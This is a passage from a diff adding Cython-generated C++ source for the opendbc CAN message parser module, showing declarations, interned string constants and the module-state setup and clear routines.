*__Pyx__Coroutine_NewInit( + __pyx_CoroutineObject *gen, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, + PyObject *name, PyObject *qualname, PyObject *module_name); +static CYTHON_INLINE void __Pyx_Coroutine_ExceptionClear(__Pyx_ExcInfoStruct *self); +static int __Pyx_Coroutine_clear(PyObject *self); +static PyObject *__Pyx_Coroutine_Send(PyObject *self, PyObject *value); +static PyObject *__Pyx_Coroutine_Close(PyObject *self); +static PyObject *__Pyx_Coroutine_Throw(PyObject *gen, PyObject *args); +#if CYTHON_USE_EXC_INFO_STACK +#define __Pyx_Coroutine_SwapException(self) +#define __Pyx_Coroutine_ResetAndClearException(self) __Pyx_Coroutine_ExceptionClear(&(self)->gi_exc_state) +#else +#define __Pyx_Coroutine_SwapException(self) {\ + __Pyx_ExceptionSwap(&(self)->gi_exc_state.exc_type, &(self)->gi_exc_state.exc_value, &(self)->gi_exc_state.exc_traceback);\ + __Pyx_Coroutine_ResetFrameBackpointer(&(self)->gi_exc_state);\ + } +#define __Pyx_Coroutine_ResetAndClearException(self) {\ + __Pyx_ExceptionReset((self)->gi_exc_state.exc_type, (self)->gi_exc_state.exc_value, (self)->gi_exc_state.exc_traceback);\ + (self)->gi_exc_state.exc_type = (self)->gi_exc_state.exc_value = (self)->gi_exc_state.exc_traceback = NULL;\ + } +#endif +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyGen_FetchStopIterationValue(pvalue)\ + __Pyx_PyGen__FetchStopIterationValue(__pyx_tstate, pvalue) +#else +#define __Pyx_PyGen_FetchStopIterationValue(pvalue)\ + __Pyx_PyGen__FetchStopIterationValue(__Pyx_PyThreadState_Current, pvalue) +#endif +static int __Pyx_PyGen__FetchStopIterationValue(PyThreadState *tstate, PyObject **pvalue); +static CYTHON_INLINE void __Pyx_Coroutine_ResetFrameBackpointer(__Pyx_ExcInfoStruct *exc_state); + +/* PatchModuleWithCoroutine.proto */ +static PyObject* __Pyx_Coroutine_patch_module(PyObject* module, const char* py_code); + +/* PatchGeneratorABC.proto */ +static int __Pyx_patch_abc(void); + +/* Generator.proto */ +#define __Pyx_Generator_USED +#define __Pyx_Generator_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_GeneratorType) +#define __Pyx_Generator_New(body, code, closure, name, qualname, module_name)\ + __Pyx__Coroutine_New(__pyx_GeneratorType, body, code, closure, name, qualname, module_name) +static PyObject *__Pyx_Generator_Next(PyObject *self); +static int __pyx_Generator_init(PyObject *module); + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libcpp.string" */ + +/* Module declarations from "libcpp.vector" */ + +/* Module declarations from "libcpp.utility" */ + +/* Module declarations from "libcpp.unordered_set" */ + +/* Module declarations from "libc.stdint" */ + +/* Module declarations from "libcpp.map" */ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "opendbc.can.common" */ + +/* Module declarations from "opendbc.can.parser_pyx" */ +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &); /*proto*/ +static std::vector __pyx_convert_vector_from_py_std_3a__3a_string(PyObject *); /*proto*/ +static PyObject *__pyx_convert_vector_to_py_double(std::vector const &); /*proto*/ +static PyObject *__pyx_convert_unordered_set_to_py_uint32_t(std::unordered_set const &); /*proto*/ +/* #### Code section: typeinfo ### */ +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "opendbc.can.parser_pyx" +extern int __pyx_module_is_main_opendbc__can__parser_pyx; +int __pyx_module_is_main_opendbc__can__parser_pyx = 0; + +/* Implementation of "opendbc.can.parser_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_RuntimeError; +static PyObject *__pyx_builtin_range; +static PyObject *__pyx_builtin_print; +static PyObject *__pyx_builtin_hex; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin_zip; +static PyObject *__pyx_builtin_MemoryError; +/* #### Code section: string_decls ### */ +static const char __pyx_k_[] = " ("; +static const char __pyx_k_l[] = "l"; +static const char __pyx_k_v[] = "v"; +static const char __pyx_k__2[] = ")"; +static const char __pyx_k__3[] = ", "; +static const char __pyx_k__4[] = "'"; +static const char __pyx_k__7[] = "*"; +static const char __pyx_k__8[] = "."; +static const char __pyx_k_cv[] = "cv"; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_in[] = " in "; +static const char __pyx_k_it[] = "it"; +static const char __pyx_k_DBC[] = ", DBC "; +static const char __pyx_k__18[] = "?"; +static const char __pyx_k_add[] = "add"; +static const char __pyx_k_bus[] = "bus"; +static const char __pyx_k_get[] = "get"; +static const char __pyx_k_hex[] = "hex"; +static const char __pyx_k_zip[] = "zip"; +static const char __pyx_k_None[] = "None"; +static const char __pyx_k_args[] = "args"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_name[] = "__name__"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_send[] = "send"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_clear[] = "clear"; +static const char __pyx_k_close[] = "close"; +static const char __pyx_k_items[] = "items"; +static const char __pyx_k_print[] = "print"; +static const char __pyx_k_range[] = "range"; +static const char __pyx_k_split[] = "split"; +static const char __pyx_k_throw[] = "throw"; +static const char __pyx_k_Number[] = "Number"; +static const char __pyx_k_checks[] = "checks"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_in_DBC[] = " in DBC "; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_update[] = "update"; +static const char __pyx_k_values[] = "values"; +static const char __pyx_k_cv_name[] = "cv_name"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_genexpr[] = "genexpr"; +static const char __pyx_k_numbers[] = "numbers"; +static const char __pyx_k_sendcan[] = "sendcan"; +static const char __pyx_k_signals[] = "signals"; +static const char __pyx_k_strings[] = "strings"; +static const char __pyx_k_dbc_name[] = "dbc_name"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_new_vals[] = "new_vals"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_CANDefine[] = "CANDefine"; +static const char __pyx_k_CANParser[] = "CANParser"; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_MemoryError[] = "MemoryError"; +static const char __pyx_k_collections[] = "collections"; +static const char __pyx_k_defaultdict[] = "defaultdict"; +static const char __pyx_k_RuntimeError[] = "RuntimeError"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_class_getitem[] = "__class_getitem__"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_updated_addrs[] = "updated_addrs"; +static const char __pyx_k_Can_t_find_DBC[] = "Can't find DBC: "; +static const char __pyx_k_enforce_checks[] = "enforce_checks"; +static const char __pyx_k_update_strings[] = "update_strings"; +static const char __pyx_k_Unchecked_addrs[] = "Unchecked addrs: "; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_Can_t_find_DBC_2[] = "Can't find DBC: '"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_could_not_find_signal[] = "could not find signal "; +static const char __pyx_k_init___locals_genexpr[] = "__init__..genexpr"; +static const char __pyx_k_could_not_find_message[] = "could not find message "; +static const char __pyx_k_opendbc_can_parser_pyx[] = "opendbc.can.parser_pyx"; +static const char __pyx_k_CANParser_update_strings[] = "CANParser.update_strings"; +static const char __pyx_k_CANDefine___reduce_cython[] = "CANDefine.__reduce_cython__"; +static const char __pyx_k_CANParser___reduce_cython[] = "CANParser.__reduce_cython__"; +static const char __pyx_k_opendbc_can_parser_pyx_pyx[] = "opendbc/can/parser_pyx.pyx"; +static const char __pyx_k_CANDefine___setstate_cython[] = "CANDefine.__setstate_cython__"; +static const char __pyx_k_CANParser___setstate_cython[] = "CANParser.__setstate_cython__"; +static const char __pyx_k_self_dbc_cannot_be_converted_to[] = "self.dbc cannot be converted to a Python object for pickling"; +static const char __pyx_k_self_can_self_dbc_cannot_be_conv[] = "self.can,self.dbc cannot be converted to a Python object for pickling"; +/* #### Code section: decls ### */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8__init___genexpr(PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8__init___3genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser___init__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self, PyObject *__pyx_v_dbc_name, PyObject *__pyx_v_signals, PyObject *__pyx_v_checks, PyObject *__pyx_v_bus, PyObject *__pyx_v_enforce_checks); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_2update_strings(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self, PyObject *__pyx_v_strings, PyObject *__pyx_v_sendcan); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_9can_valid___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_11bus_timeout___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_2vl___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_6vl_all___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8ts_nanos___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8dbc_name___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_4__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_6__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine___init__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, PyObject *__pyx_v_dbc_name); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self); /* proto */ +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv_2__set__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv_4__del__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self); /* proto */ +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_2__set__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_4__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx_CANParser(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx_CANDefine(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static __Pyx_CachedCFunction __pyx_umethod_PyDict_Type_get = {0, 0, 0, 0, 0}; +static __Pyx_CachedCFunction __pyx_umethod_PyDict_Type_update = {0, 0, 0, 0, 0}; +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_7opendbc_3can_10parser_pyx_CANParser; + PyObject *__pyx_type_7opendbc_3can_10parser_pyx_CANDefine; + PyObject *__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__; + PyObject *__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr; + PyObject *__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr; + #endif + PyTypeObject *__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser; + PyTypeObject *__pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine; + PyTypeObject *__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__; + PyTypeObject *__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr; + PyTypeObject *__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr; + PyObject *__pyx_kp_u_; + PyObject *__pyx_n_s_CANDefine; + PyObject *__pyx_n_s_CANDefine___reduce_cython; + PyObject *__pyx_n_s_CANDefine___setstate_cython; + PyObject *__pyx_n_s_CANParser; + PyObject *__pyx_n_s_CANParser___reduce_cython; + PyObject *__pyx_n_s_CANParser___setstate_cython; + PyObject *__pyx_n_s_CANParser_update_strings; + PyObject *__pyx_kp_u_Can_t_find_DBC; + PyObject *__pyx_kp_u_Can_t_find_DBC_2; + PyObject *__pyx_kp_u_DBC; + PyObject *__pyx_n_s_MemoryError; + PyObject *__pyx_kp_u_None; + PyObject *__pyx_n_s_Number; + PyObject *__pyx_n_s_RuntimeError; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_kp_u_Unchecked_addrs; + PyObject *__pyx_n_s__18; + PyObject *__pyx_kp_u__2; + PyObject *__pyx_kp_u__3; + PyObject *__pyx_kp_u__4; + PyObject *__pyx_n_s__7; + PyObject *__pyx_kp_u__8; + PyObject *__pyx_n_s_add; + PyObject *__pyx_n_s_args; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_bus; + PyObject *__pyx_n_s_checks; + PyObject *__pyx_n_s_class_getitem; + PyObject *__pyx_n_s_clear; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_close; + PyObject *__pyx_n_s_collections; + PyObject *__pyx_kp_u_could_not_find_message; + PyObject *__pyx_kp_u_could_not_find_signal; + PyObject *__pyx_n_s_cv; + PyObject *__pyx_n_s_cv_name; + PyObject *__pyx_n_s_dbc_name; + PyObject *__pyx_n_s_defaultdict; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_enforce_checks; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_genexpr; + PyObject *__pyx_n_s_get; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_s_hex; + PyObject *__pyx_n_s_import; + PyObject *__pyx_kp_u_in; + PyObject *__pyx_kp_u_in_DBC; + PyObject *__pyx_n_s_init___locals_genexpr; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_it; + PyObject *__pyx_n_s_items; + PyObject *__pyx_n_s_l; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_new_vals; + PyObject *__pyx_n_s_numbers; + PyObject *__pyx_n_s_opendbc_can_parser_pyx; + PyObject *__pyx_kp_s_opendbc_can_parser_pyx_pyx; + PyObject *__pyx_n_s_print; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_range; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_self; + PyObject *__pyx_kp_s_self_can_self_dbc_cannot_be_conv; + PyObject *__pyx_kp_s_self_dbc_cannot_be_converted_to; + PyObject *__pyx_n_s_send; + PyObject *__pyx_n_s_sendcan; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_signals; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_n_s_split; + PyObject *__pyx_n_s_strings; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_throw; + PyObject *__pyx_n_s_update; + PyObject *__pyx_n_s_update_strings; + PyObject *__pyx_n_s_updated_addrs; + PyObject *__pyx_n_s_v; + PyObject *__pyx_n_s_values; + PyObject *__pyx_n_s_zip; + PyObject *__pyx_int_0; + PyObject *__pyx_int_1; + PyObject *__pyx_int_2; + PyObject *__pyx_slice__5; + PyObject *__pyx_slice__6; + PyObject *__pyx_tuple__9; + PyObject *__pyx_tuple__11; + PyObject *__pyx_tuple__12; + PyObject *__pyx_tuple__14; + PyObject *__pyx_codeobj__10; + PyObject *__pyx_codeobj__13; + PyObject *__pyx_codeobj__15; + PyObject *__pyx_codeobj__16; + PyObject *__pyx_codeobj__17; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx_CANParser); + Py_CLEAR(clear_module_state->__pyx_type_7opendbc_3can_10parser_pyx_CANParser); + Py_CLEAR(clear_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx_CANDefine); + Py_CLEAR(clear_module_state->__pyx_type_7opendbc_3can_10parser_pyx_CANDefine); + Py_CLEAR(clear_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__); + Py_CLEAR(clear_module_state->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__); + Py_CLEAR(clear_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr); + Py_CLEAR(clear_module_state->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr); + Py_CLEAR(clear_module_state->__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr); + Py_CLEAR(clear_module_state->__pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr); + Py_CLEAR(clear_module_state->__pyx_kp_u_); + Py_CLEAR(clear_module_state->__pyx_n_s_CANDefine); + Py_CLEAR(clear_module_state->__pyx_n_s_CANDefine___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_CANDefine___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_CANParser); + Py_CLEAR(clear_module_state->__pyx_n_s_CANParser___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_CANParser___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_CANParser_update_strings); + Py_CLEAR(clear_module_state->__pyx_kp_u_Can_t_find_DBC); + Py_CLEAR(clear_module_state->__pyx_kp_u_Can_t_find_DBC_2); + Py_CLEAR(clear_module_state->__pyx_kp_u_DBC); + Py_CLEAR(clear_module_state->__pyx_n_s_MemoryError); + Py_CLEAR(clear_module_state->__pyx_kp_u_None); + Py_CLEAR(clear_module_state->__pyx_n_s_Number); + Py_CLEAR(clear_module_state->__pyx_n_s_RuntimeError); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_kp_u_Unchecked_addrs); + Py_CLEAR(clear_module_state->__pyx_n_s__18); + Py_CLEAR(clear_module_state->__pyx_kp_u__2); + Py_CLEAR(clear_module_state->__pyx_kp_u__3); + Py_CLEAR(clear_module_state->__pyx_kp_u__4); + Py_CLEAR(clear_module_state->__pyx_n_s__7); + Py_CLEAR(clear_module_state->__pyx_kp_u__8); + Py_CLEAR(clear_module_state->__pyx_n_s_add); + Py_CLEAR(clear_module_state->__pyx_n_s_args); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_bus); + Py_CLEAR(clear_module_state->__pyx_n_s_checks); + Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); + Py_CLEAR(clear_module_state->__pyx_n_s_clear); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_close); + Py_CLEAR(clear_module_state->__pyx_n_s_collections); + Py_CLEAR(clear_module_state->__pyx_kp_u_could_not_find_message); + Py_CLEAR(clear_module_state->__pyx_kp_u_could_not_find_signal); + Py_CLEAR(clear_module_state->__pyx_n_s_cv); + Py_CLEAR(clear_module_state->__pyx_n_s_cv_name); + Py_CLEAR(clear_module_state->__pyx_n_s_dbc_name); + Py_CLEAR(clear_module_state->__pyx_n_s_defaultdict); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_enforce_checks); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_genexpr); + Py_CLEAR(clear_module_state->__pyx_n_s_get); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_s_hex); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_kp_u_in); + Py_CLEAR(clear_module_state->__pyx_kp_u_in_DBC); + Py_CLEAR(clear_module_state->__pyx_n_s_init___locals_genexpr); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_it); + Py_CLEAR(clear_module_state->__pyx_n_s_items); + Py_CLEAR(clear_module_state->__pyx_n_s_l); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_new_vals); + Py_CLEAR(clear_module_state->__pyx_n_s_numbers); + Py_CLEAR(clear_module_state->__pyx_n_s_opendbc_can_parser_pyx); + Py_CLEAR(clear_module_state->__pyx_kp_s_opendbc_can_parser_pyx_pyx); + Py_CLEAR(clear_module_state->__pyx_n_s_print); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_range); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_kp_s_self_can_self_dbc_cannot_be_conv); + Py_CLEAR(clear_module_state->__pyx_kp_s_self_dbc_cannot_be_converted_to); + Py_CLEAR(clear_module_state->__pyx_n_s_send); + Py_CLEAR(clear_module_state->__pyx_n_s_sendcan); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_signals); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_n_s_split); + Py_CLEAR(clear_module_state->__pyx_n_s_strings); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_throw); + Py_CLEAR(clear_module_state->__pyx_n_s_update); + Py_CLEAR(clear_module_state->__pyx_n_s_update_strings); + Py_CLEAR(clear_module_state->__pyx_n_s_updated_addrs); + Py_CLEAR(clear_module_state->__pyx_n_s_v); + Py_CLEAR(clear_module_state->__pyx_n_s_values); + Py_CLEAR(clear_module_state->__pyx_n_s_zip); + Py_CLEAR(clear_module_state->__pyx_int_0); + Py_CLEAR(clear_module_state->__pyx_int_1); + Py_CLEAR(clear_module_state->__pyx_int_2); + Py_CLEAR(clear_module_state->__pyx_slice__5); + Py_CLEAR(clear_module_state->__pyx_slice__6); + Py_CLEAR(clear_module_state->__pyx_tuple__9); + Py_CLEAR(clear_module_state->__pyx_tuple__11); + Py_CLEAR(clear_module_state->__pyx_tuple__12); + Py_CLEAR(clear_module_state->__pyx_tuple__14); + Py_CLEAR(clear_module_state->__pyx_codeobj__10); + Py_CLEAR(clear_module_state->__pyx_codeobj__13); + Py_CLEAR(clear_module_state->__pyx_codeobj__15); + Py_CLEAR(clear_module_state->__pyx_codeobj__16); + Py_CLEAR(clear_module_state->__pyx_codeobj__17); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + 